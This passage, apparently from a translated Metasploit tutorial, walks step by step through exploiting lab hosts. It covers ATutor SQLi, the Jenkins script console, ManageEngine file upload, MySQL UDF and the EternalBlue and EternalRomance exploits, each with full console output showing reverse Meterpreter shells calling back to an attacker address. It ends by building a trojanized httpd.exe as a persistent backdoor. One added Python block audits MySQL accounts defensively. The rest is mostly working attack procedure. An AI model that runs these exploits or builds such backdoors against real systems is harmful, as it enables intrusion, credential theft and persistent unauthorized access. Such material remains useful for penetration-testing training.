   2   generic/shell_bind_tcp                               normal  No     Generic Command Shell, Bind TCP Inline
   3   generic/shell_reverse_tcp                            normal  No     Generic Command Shell, Reverse TCP Inline
   4   php/bind_perl                                        normal  No     PHP Command Shell, Bind TCP (via Perl)
   5   php/bind_perl_ipv6                                   normal  No     PHP Command Shell, Bind TCP (via perl) IPv6
   6   php/bind_php                                         normal  No     PHP Command Shell, Bind TCP (via PHP)
   7   php/bind_php_ipv6                                    normal  No     PHP Command Shell, Bind TCP (via php) IPv6
   8   php/download_exec                                    normal  No     PHP Executable Download and Execute
   9   php/exec                                             normal  No     PHP Execute Command
   10  php/meterpreter/bind_tcp                             normal  No     PHP Meterpreter, Bind TCP Stager
   11  php/meterpreter/bind_tcp_ipv6                        normal  No     PHP Meterpreter, Bind TCP Stager IPv6
   12  php/meterpreter/bind_tcp_ipv6_uuid                   normal  No     PHP Meterpreter, Bind TCP Stager IPv6 with UUID Support
   13  php/meterpreter/bind_tcp_uuid                        normal  No     PHP Meterpreter, Bind TCP Stager with UUID Support
   14  php/meterpreter/reverse_tcp                          normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   15  php/meterpreter/reverse_tcp_uuid                     normal  No     PHP Meterpreter, PHP Reverse TCP Stager
   16  php/meterpreter_reverse_tcp                          normal  No     PHP Meterpreter, Reverse TCP Inline
   17  php/reverse_perl                                     normal  No     PHP Command, Double Reverse TCP Connection (via Perl)
   18  php/reverse_php                                      normal  No     PHP Command Shell, Reverse TCP (via PHP)

msf5 exploit(multi/http/atutor_sqli) >

2. To view a payload's details, use info <payload>:

msf5 exploit(multi/http/atutor_sqli) > info payload/generic/shell_bind_tcp

       Name: Generic Command Shell, Bind TCP Inline
     Module: payload/generic/shell_bind_tcp
   Platform: All
       Arch: x86, x86_64, x64, mips, mipsle, mipsbe, mips64, mips64le, ppc, ppce500v2, ppc64, ppc64le, cbea, cbea64, sparc, sparc64, armle, armbe, aarch64, cmd, php, java, ruby, dalvik, python, nodejs, firefox, zarch, r
Needs Admin: No
 Total size: 0
       Rank: Normal

Provided by:
  skape <mmiller@hick.org>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LPORT  4444             yes       The listen port
RHOST                   no        The target address

Description:
  Listen for a connection and spawn a command shell

msf5 exploit(multi/http/atutor_sqli) >

3. generic/shell_bind_tcp is a single (stand-alone) payload. To select it, use set payload <payload_name>:

msf5 exploit(multi/http/atutor_sqli) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
msf5 exploit(multi/http/atutor_sqli) > exploit

[*] 192.168.177.139:80 - Dumping the username and password hash...

4. generic/shell_bind_tcp only gives a basic command shell, which is quite limited. PHP Meterpreter is a far more capable, feature-rich payload that we can use with this exploit:

msf5 exploit(multi/http/atutor_sqli) > info payload/php/meterpreter/reverse_tcp

       Name: PHP Meterpreter, PHP Reverse TCP Stager
     Module: payload/php/meterpreter/reverse_tcp
   Platform: PHP
       Arch: php
Needs Admin: No
 Total size: 1101
       Rank: Normal

Provided by:
  egypt <egypt@metasploit.com>

Basic options:
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST                   yes       The listen address (an interface may be specified)
LPORT  4444             yes       The listen port

Description:
  Run a meterpreter server in PHP. Reverse PHP connect back stager
  with checks for disabled functions


msf5 exploit(multi/http/atutor_sqli) >

msf5 exploit(multi/http/atutor_sqli) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf5 exploit(multi/http/atutor_sqli) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(multi/http/atutor_sqli) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.139:80 - Dumping the username and password hash...
[+] 192.168.177.139:80 - Got the root's hash: 9c352326223a09bc610ff4919e611bed3fbb28f5 !
[*] Sending stage (38247 bytes) to 192.168.177.139
[*] Meterpreter session 14 opened (192.168.177.143:4444 -> 192.168.177.139:51063) at 2019-04-28 16:42:49 +0800
[!] This exploit may require manual cleanup of 'bgxx.php' on the target
[!] This exploit may require manual cleanup of '/var/content/module/glt/bgxx.php' on the target

meterpreter >
[+] 192.168.177.139:80 - Deleted bgxx.php
meterpreter > getuid
Server username: Administrator (0)
meterpreter > sysinfo
Computer    : WIN-BGKRU85VR4H
OS          : Windows NT WIN-BGKRU85VR4H 6.1 build 7600 (Windows 7 Business Edition) i586
Meterpreter : php/windows
meterpreter >


4. Attacking Windows servers

Using the information collected earlier, we now target a Windows server. In this section we use Metasploitable3 as the target.

準備工做

Using the information we collected, look up vulnerabilities and pick a suitable exploit module.

Use services to view the version of the Apache service on the target:

msf5 > services -p 8020 192.168.177.144
Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.177.144  8020  tcp    http  open   Apache httpd

msf5 >

Open the target site in a browser.

Browsing the target site, we can try logging in with a weak password, for example admin.

It actually lets us in.

How to do it...

1. Look at the Jenkins-CI service running on port 8484.

msf5 > services 192.168.177.144 -p 8484
Services
========

host             port  proto  name  state  info
----             ----  -----  ----  -----  ----
192.168.177.144  8484  tcp    http  open   Jetty winstone-2.8

Jenkins is not shown here, so let's open it in a browser.

It is indeed a Jenkins service.

We use search jenkins to look for usable modules.

msf5 > search jenkins                                                                                 
Matching Modules                                                                                                                                                
================                                                                                                                                                
                                                                                                                                                                
   #   Name                                                  Disclosure Date  Rank       Check  Description                                                     
   -   ----                                                  ---------------  ----       -----  -----------                                                     
   1   auxiliary/gather/jenkins_cred_recovery                                 normal     Yes    Jenkins Domain Credential Recovery                              
   2   auxiliary/scanner/http/jenkins_command                                 normal     Yes    Jenkins-CI Unauthenticated Script-Console Scanner               
   3   auxiliary/scanner/http/jenkins_enum                                    normal     Yes    Jenkins-CI Enumeration                                          
   4   auxiliary/scanner/http/jenkins_login                                   normal     Yes    Jenkins-CI Login Utility                                        
   5   auxiliary/scanner/jenkins/jenkins_udp_broadcast_enum                   normal     No     Jenkins Server Broadcast Enumeration                            
   6   exploit/linux/misc/jenkins_java_deserialize           2015-11-18       excellent  Yes    Jenkins CLI RMI Java Deserialization Vulnerability              
   7   exploit/linux/misc/jenkins_ldap_deserialize           2016-11-16       excellent  Yes    Jenkins CLI HTTP Java Deserialization Vulnerability             
   8   exploit/linux/misc/opennms_java_serialize             2015-11-06       normal     No     OpenNMS Java Object Unserialization Remote Code Execution       
   9   exploit/multi/http/jenkins_metaprogramming            2019-01-08       excellent  Yes    Jenkins ACL Bypass and Metaprogramming RCE                      
   10  exploit/multi/http/jenkins_script_console             2013-01-18       good       Yes    Jenkins-CI Script-Console Java Execution                        
   11  exploit/multi/http/jenkins_xstream_deserialize        2016-02-24       excellent  Yes    Jenkins XStream Groovy classpath Deserialization Vulnerability  
   12  exploit/windows/misc/ibm_websphere_java_deserialize   2015-11-06       excellent  No     IBM WebSphere RCE Java Deserialization Vulnerability            
   13  post/multi/gather/jenkins_gather                                       normal     No     Jenkins Credential Collector                                                                                                                                 
msf5 >                                                                                                                                                          

Use the Jenkins-CI Script-Console Java Execution module.

msf5 > use  exploit/multi/http/jenkins_script_console
msf5 exploit(multi/http/jenkins_script_console) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(multi/http/jenkins_script_console) > set RPORT 8484
RPORT => 8484
msf5 exploit(multi/http/jenkins_script_console) > set TARGETURI /
TARGETURI => /
msf5 exploit(multi/http/jenkins_script_console) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] Checking access to the script console
[*] No authentication required, skipping login...
[*] 192.168.177.144:8484 - Sending command stager...
[*] Command Stager progress -   2.06% done (2048/99626 bytes)
[*] Command Stager progress -   4.11% done (4096/99626 bytes)
[*] Command Stager progress -   6.17% done (6144/99626 bytes)
....
[*] Command Stager progress -  98.67% done (98304/99626 bytes)
[*] Command Stager progress - 100.00% done (99626/99626 bytes)
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:49555) at 2019-04-26 17:32:58 +0800

meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter >

Attacking ManageEngine Desktop Central 9

msf5 exploit(multi/http/jenkins_script_console) > search type:exploit Manageengine

Matching Modules
================

   #   Name                                                     Disclosure Date  Rank       Check  Description
   -   ----                                                     ---------------  ----       -----  -----------
   1   exploit/multi/http/eventlog_file_upload                  2014-08-31       excellent  Yes    ManageEngine Eventlog Analyzer Arbitrary File Upload
   2   exploit/multi/http/manage_engine_dc_pmp_sqli             2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/multi/http/manageengine_auth_upload              2014-12-15       excellent  Yes    ManageEngine Multiple Products Authenticated File Upload
   4   exploit/multi/http/manageengine_sd_uploader              2015-08-20       excellent  Yes    ManageEngine ServiceDesk Plus Arbitrary File Upload
   5   exploit/multi/http/manageengine_search_sqli              2012-10-18       excellent  Yes    ManageEngine Security Manager Plus 5.5 Build 5505 SQL Injection
   6   exploit/multi/http/opmanager_socialit_file_upload        2014-09-27       excellent  Yes    ManageEngine OpManager and Social IT Arbitrary File Upload
   7   exploit/windows/http/desktopcentral_file_upload          2013-11-11       excellent  Yes    ManageEngine Desktop Central AgentLogUpload Arbitrary File Upload
   8   exploit/windows/http/desktopcentral_statusupdate_upload  2014-08-31       excellent  Yes    ManageEngine Desktop Central StatusUpdate Arbitrary File Upload
   9   exploit/windows/http/manage_engine_opmanager_rce         2015-09-14       manual     Yes    ManageEngine OpManager Remote Code Execution
   10  exploit/windows/http/manageengine_adshacluster_rce       2018-06-28       excellent  Yes    Manage Engine Exchange Reporter Plus Unauthenticated RCE
   11  exploit/windows/http/manageengine_appmanager_exec        2018-03-07       excellent  Yes    ManageEngine Applications Manager Remote Code Execution
   12  exploit/windows/http/manageengine_apps_mngr              2011-04-08       average    No     ManageEngine Applications Manager Authenticated Code Execution
   13  exploit/windows/http/manageengine_connectionid_write     2015-12-14       excellent  Yes    ManageEngine Desktop Central 9 FileUploadServlet ConnectionId Vulnerability
   14  exploit/windows/misc/manageengine_eventlog_analyzer_rce  2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution


msf5 exploit(multi/http/jenkins_script_console) >
msf5 exploit(multi/http/jenkins_script_console) > use exploit/windows/http/manageengine_connectionid_write
msf5 exploit(windows/http/manageengine_connectionid_write) > set PAYLOAD windows/meterpreter/reverse_http
PAYLOAD => windows/meterpreter/reverse_http
msf5 exploit(windows/http/manageengine_connectionid_write) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit

[-] Exploit failed: The following options failed to validate: RHOSTS.
[*] Exploit completed, but no session was created.
msf5 exploit(windows/http/manageengine_connectionid_write) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/http/manageengine_connectionid_write) > exploit

[*] Started HTTP reverse handler on http://192.168.177.143:8080
[*] Creating JSP stager
[*] Uploading JSP stager uBzAP.jsp...
[*] Executing stager...
[*] http://192.168.177.143:8080 handling request from 192.168.177.144; (UUID: tsqgh8zb) Staging x86 payload (180825 bytes) ...
[*] Meterpreter session 3 opened (192.168.177.143:8080 -> 192.168.177.144:49632) at 2019-04-26 17:39:09 +0800
[!] This exploit may require manual cleanup of '../webapps/DesktopCentral/jspf/uBzAP.jsp' on the target

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

5. Exploiting common services

During exploitation, some services are related to most of the other services on the target, yet in most cases they are overlooked.

準備工做

In this section we will exploit one of the most common and most easily abused services in the target environment: MySQL. In most cases we can exploit the MySQL service because it was installed for development purposes and some hardening was skipped, such as setting a root password at all or choosing a strong one.

In this section we use Metasploitable3 as the target machine.

How to do it...

To exploit the target's MySQL service, we first enumerate the target with the MySQL enumeration module, then use the Oracle MySQL for Microsoft Windows Payload exploit module to get a shell on the remote host.

TIP: the mysql_payload module has been removed from recent versions of Metasploit. You can download it from https://www.exploit-db.com/download/16957, place it in the matching Metasploit module directory (/usr/share/metasploit-framework/modules/exploits/windows/mysql), and change the first few lines of the code to the following.

##                                                                        
# $Id: mysql_payload.rb 11899 2011-03-08 22:42:26Z todb $                 
##                                                                        
                                                                          
##                                                                        
# This file is part of the Metasploit Framework and may be subject to     
# redistribution and commercial restrictions. Please see the Metasploit   
# Framework web site for more information on licensing and terms of use.  
# http://metasploit.com/framework/                                        
##                                                                        
                                                                          
require 'msf/core'                                                        
                                                                          
class MetasploitModule < Msf::Exploit::Remote                             
        Rank = ExcellentRanking                                           
                                                                          
        include Msf::Exploit::Remote::MYSQL                               
        include Msf::Exploit::CmdStager                                   
                                                                          
複製代碼

Enumeration:

msf5 auxiliary(admin/mysql/mysql_enum) > use auxiliary/admin/mysql/mysql_enum
msf5 auxiliary(admin/mysql/mysql_enum) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 auxiliary(admin/mysql/mysql_enum) > set USERNAME root
USERNAME => root
msf5 auxiliary(admin/mysql/mysql_enum) > run
[*] Running module against 192.168.177.144

[*] 192.168.177.144:3306 - Running MySQL Enumerator...
[*] 192.168.177.144:3306 - Enumerating Parameters
[*] 192.168.177.144:3306 -      MySQL Version: 5.5.20-log
[*] 192.168.177.144:3306 -      Compiled for the following OS: Win64
[*] 192.168.177.144:3306 -      Architecture: x86
[*] 192.168.177.144:3306 -      Server Hostname: metasploitable3
[*] 192.168.177.144:3306 -      Data Directory: c:\wamp\bin\mysql\mysql5.5.20\data\
[*] 192.168.177.144:3306 -      Logging of queries and logins: OFF
[*] 192.168.177.144:3306 -      Old Password Hashing Algorithm OFF
[*] 192.168.177.144:3306 -      Loading of local files: ON
[*] 192.168.177.144:3306 -      Deny logins with old Pre-4.1 Passwords: OFF
[*] 192.168.177.144:3306 -      Allow Use of symlinks for Database Files: YES
[*] 192.168.177.144:3306 -      Allow Table Merge:
[*] 192.168.177.144:3306 -      SSL Connection: DISABLED
[*] 192.168.177.144:3306 - Enumerating Accounts:
[*] 192.168.177.144:3306 -      List of Accounts with Password Hashes:
[+] 192.168.177.144:3306 -              User: root Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: 127.0.0.1 Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: ::1 Password Hash:
[+] 192.168.177.144:3306 -              User:  Host: localhost Password Hash:
[+] 192.168.177.144:3306 -              User: root Host: % Password Hash:
[*] 192.168.177.144:3306 -      The following users have GRANT Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -      The following users have CREATE USER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have RELOAD Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SHUTDOWN Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have SUPER Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have FILE Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following users have PROCESS Privilege:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts have privileges to the mysql database:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      Anonymous Accounts are Present:
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -      The following accounts have empty passwords:
[*] 192.168.177.144:3306 -              User: root Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: 127.0.0.1
[*] 192.168.177.144:3306 -              User: root Host: ::1
[*] 192.168.177.144:3306 -              User:  Host: localhost
[*] 192.168.177.144:3306 -              User: root Host: %
[*] 192.168.177.144:3306 -      The following accounts are not restricted by source:
[*] 192.168.177.144:3306 -              User: root Host: %
[*] Auxiliary module execution completed
msf5 auxiliary(admin/mysql/mysql_enum) >

Exploitation:

msf5> use exploit/windows/mysql/mysql_payload
msf5 exploit(windows/mysql/mysql_payload) > show options
msf5 exploit(windows/mysql/mysql_payload) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/mysql/mysql_payload) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/mysql/mysql_payload) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/mysql/mysql_payload) > set LPORT 4444
LPORT => 4444
msf5 exploit(windows/mysql/mysql_payload) > exploit
[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:3306 - Checking target architecture...
[*] 192.168.177.144:3306 - Checking for sys_exec()...
[*] 192.168.177.144:3306 - sys_exec() already available, using that (override with FORCE_UDF_UPLOAD).
[*] 192.168.177.144:3306 - Command Stager progress -   1.47% done (1499/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   2.93% done (2998/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   4.40% done (4497/102246 bytes)
[*] 192.168.177.144:3306 - Command Stager progress -   5.86% done (5996/102246 bytes)
......
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] 192.168.177.144:3306 - Command Stager progress - 100.00% done (102246/102246 bytes)
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:55358) at 2019-04-26 16:25:45 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

If the target's MySQL has no root password set, the MySQL service can be used to upload a shell and gain remote access to the system, exactly as above. So never forget to test the basic services, even if you think nobody would be foolish enough to run a service without a password.
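The enumeration output above is the attacker's view of the same facts a DBA should be checking before anyone else does. As an added example (not from the book and not Metasploit's code), the Python below audits account rows like the ones mysql_enum lists and proposes the statements that would close each finding. The sample rows are constructed from the output above; the field names follow the mysql.user table, and the remediation uses MySQL 5.5 syntax because that is the server version shown.

```python
"""Audit MySQL accounts for the weaknesses mysql_enum reports.

Added example, not Metasploit's code. SAMPLE_ROWS is constructed from
the enumeration output above; on a real server, replace it with
  SELECT user, host, password, File_priv FROM mysql.user;
(the column is `authentication_string` on MySQL 5.7 and later).
"""
from dataclasses import dataclass
from typing import List, Tuple

LOCAL_HOSTS = {"localhost", "127.0.0.1", "::1"}


@dataclass(frozen=True)
class Account:
    user: str
    host: str
    password_hash: str  # empty string: no password set
    file_priv: bool


# Constructed to mirror the five rows mysql_enum listed (all hashes empty).
SAMPLE_ROWS = [
    Account("root", "localhost", "", True),
    Account("root", "127.0.0.1", "", True),
    Account("root", "::1", "", True),
    Account("", "localhost", "", False),
    Account("root", "%", "", True),
]


def audit_accounts(rows: List[Account]) -> List[Tuple[str, str, str]]:
    """Return (severity, account, finding) for every weakness found."""
    findings = []
    for a in rows:
        label = f"'{a.user}'@'{a.host}'"
        if a.user == "":
            findings.append(("high", label, "anonymous account"))
        if a.password_hash == "":
            findings.append(("high", label, "empty password"))
        if a.host == "%":
            findings.append(("medium", label, "not restricted by source host"))
        if a.file_priv and a.host not in LOCAL_HOSTS:
            # FILE privilege on a network-reachable account is what a UDF upload depends on.
            findings.append(("high", label, "FILE privilege reachable from the network"))
    return findings


def remediation_sql(rows: List[Account]) -> List[str]:
    """Statements that close each finding; review before running them."""
    stmts = []
    for a in rows:
        if a.user == "":
            stmts.append(f"DROP USER ''@'{a.host}';")
        elif a.host == "%":
            stmts.append(f"DROP USER '{a.user}'@'%';")
        elif a.password_hash == "":
            # MySQL 5.5 syntax; on 5.7+ use ALTER USER ... IDENTIFIED BY.
            stmts.append(f"SET PASSWORD FOR '{a.user}'@'{a.host}' = PASSWORD('<strong password>');")
    return stmts


if __name__ == "__main__":
    for sev, who, what in audit_accounts(SAMPLE_ROWS):
        print(f"[{sev}] {who}: {what}")
    print("\n".join(remediation_sql(SAMPLE_ROWS)))
```

On the constructed rows this yields eight findings (seven high, one medium) and five statements: drop the anonymous account, drop root@'%', and set passwords on the three local root accounts. The same checks map one-to-one onto the "Anonymous Accounts", "empty passwords" and "not restricted by source" lines of the module output.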

6. MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption

Again using the information collected in the information gathering and scanning phase, in particular the output of the MS17-010 SMB RCE detection auxiliary module, we can move on to the next vulnerable service.

準備工做

The MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption exploit module is based on the Equation Group's ETERNALBLUE exploit, part of the FuzzBunch toolkit that the Shadow Brokers obtained from the US National Security Agency (NSA) and released publicly. ETERNALBLUE is generally believed to have been developed by the NSA. It exploits incorrect logic in srv.sys when handling SrvOs2FeaListSizeToNt, which causes an out-of-bounds copy and hence a buffer overflow, allowing us to execute arbitrary commands. After its release it was used by the WannaCry ransomware. This vulnerability affects all Windows workstations and servers running the SMBv1 service that have not installed the SMB security update.

How to do it...

Load the ms17_010_eternalblue module, set the target IP address, set the payload, and run the exploit.

msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_eternalblue) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_eternalblue) > set LPORT 4444
msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Connecting to target for exploitation.
[+] 192.168.177.144:445 - Connection established for exploitation.
[+] 192.168.177.144:445 - Target OS selected valid for OS indicated by SMB reply
[*] 192.168.177.144:445 - CORE raw buffer dump (51 bytes)
[*] 192.168.177.144:445 - 0x00000000  57 69 6e 64 6f 77 73 20 53 65 72 76 65 72 20 32  Windows Server 2
[*] 192.168.177.144:445 - 0x00000010  30 30 38 20 52 32 20 53 74 61 6e 64 61 72 64 20  008 R2 Standard
[*] 192.168.177.144:445 - 0x00000020  37 36 30 31 20 53 65 72 76 69 63 65 20 50 61 63  7601 Service Pac
[*] 192.168.177.144:445 - 0x00000030  6b 20 31                                         k 1
[+] 192.168.177.144:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 192.168.177.144:445 - Trying exploit with 12 Groom Allocations.
[*] 192.168.177.144:445 - Sending all but last fragment of exploit packet
[*] 192.168.177.144:445 - Starting non-paged pool grooming
[+] 192.168.177.144:445 - Sending SMBv2 buffers
[+] 192.168.177.144:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 192.168.177.144:445 - Sending final SMBv2 buffers.
[*] 192.168.177.144:445 - Sending last fragment of exploit packet!
[*] 192.168.177.144:445 - Receiving response from exploit packet
[+] 192.168.177.144:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 192.168.177.144:445 - Sending egg to corrupted connection.
[*] 192.168.177.144:445 - Triggering free of corrupted buffer.
[*] Meterpreter session 1 opened (192.168.177.143:4444 -> 192.168.177.144:49655) at 2019-04-26 17:40:54 +0800
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 192.168.177.144:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

meterpreter >
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >


7. MS17-010 EternalRomance/EternalSynergy/EternalChampion

The MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution exploit module can also be used to exploit MS17-010. It is more reliable than EternalBlue, but it requires a named pipe.

How to do it...

Use the ms17_010_psexec module.

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.177.144
RHOSTS => 192.168.177.144
msf5 exploit(windows/smb/ms17_010_psexec) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(windows/smb/ms17_010_psexec) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 192.168.177.143:4444
[*] 192.168.177.144:445 - Target OS: Windows Server 2008 R2 Standard 7601 Service Pack 1
[*] 192.168.177.144:445 - Built a write-what-where primitive...
[+] 192.168.177.144:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.177.144:445 - Selecting PowerShell target
[*] 192.168.177.144:445 - Executing the payload...
[+] 192.168.177.144:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (179779 bytes) to 192.168.177.144
[*] Meterpreter session 2 opened (192.168.177.143:4444 -> 192.168.177.144:62432) at 2019-04-28 09:37:48 +0800

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : METASPLOITABLE3
OS              : Windows 2008 R2 (Build 7601, Service Pack 1).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/windows
meterpreter >

8. Installing backdoors

After getting a shell, if we need to ensure persistent access to the target system, we need to install a backdoor.

準備工做

Through the previous exploitation we already have a session on the target machine; we will use that meterpreter session to install a backdoored service. Here we take httpd.exe as the example.

meterpreter > ps -S httpd.exe           
Filtering on 'httpd.exe'                                                       
Process List                                                                                                                                   
============                                                                                                                                  
 PID   PPID  Name               Arch  Session  User                        Path                                                                
 ---   ----  ----               ----  -------  ----                        ----                                                                
 1304  1816  dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  
 1816  472   dcserverhttpd.exe  x86   0        NT AUTHORITY\LOCAL SERVICE  C:\ManageEngine\DesktopCentral_Server\apache\bin\dcserverhttpd.exe  
 3180  472   httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe                       
 3880  3180  httpd.exe          x64   0        NT AUTHORITY\LOCAL SERVICE  C:\wamp\bin\apache\Apache2.2.21\bin\httpd.exe       
meterpreter >                             

Next, we will use the Windows registry persistence module to install a backdoor that starts with the system.

Finally, we will use WMI (Windows Management Instrumentation) to create a fileless backdoor.

How to do it...

1. The backdoor cannot be installed while the program is running, so kill the process first.

meterpreter > kill 3880
Killing: 3880
meterpreter >

2. Download the program that will be replaced with the backdoor.

meterpreter > download C:\\wamp\\bin\\apache\\apache2.2.21\\bin\\httpd.exe
[*] Downloading: C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] Downloaded 21.00 KiB of 21.00 KiB (100.0%): C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
[*] download   : C:\wamp\bin\apache\apache2.2.21\bin\httpd.exe -> httpd.exe
meterpreter >

3. Background the session, select the reverse_tcp payload, and use generate to create the backdoored file.

msf5 exploit(windows/smb/ms17_010_psexec) > use payload/windows/x64/meterpreter/reverse_tcp
msf5 payload(windows/x64/meterpreter/reverse_tcp) > set LHOST 192.168.177.143
LHOST => 192.168.177.143
msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -p Windows -x /root/httpd.exe -k -f exe -o /root/httpd-backdoored.exe
[*] Writing 29184 bytes to /root/httpd-backdoored.exe...
msf5 payload(windows/x64/meterpreter/reverse_tcp) >

For the generate parameters, see the help output:

msf5 payload(windows/x64/meterpreter/reverse_tcp) > generate -h
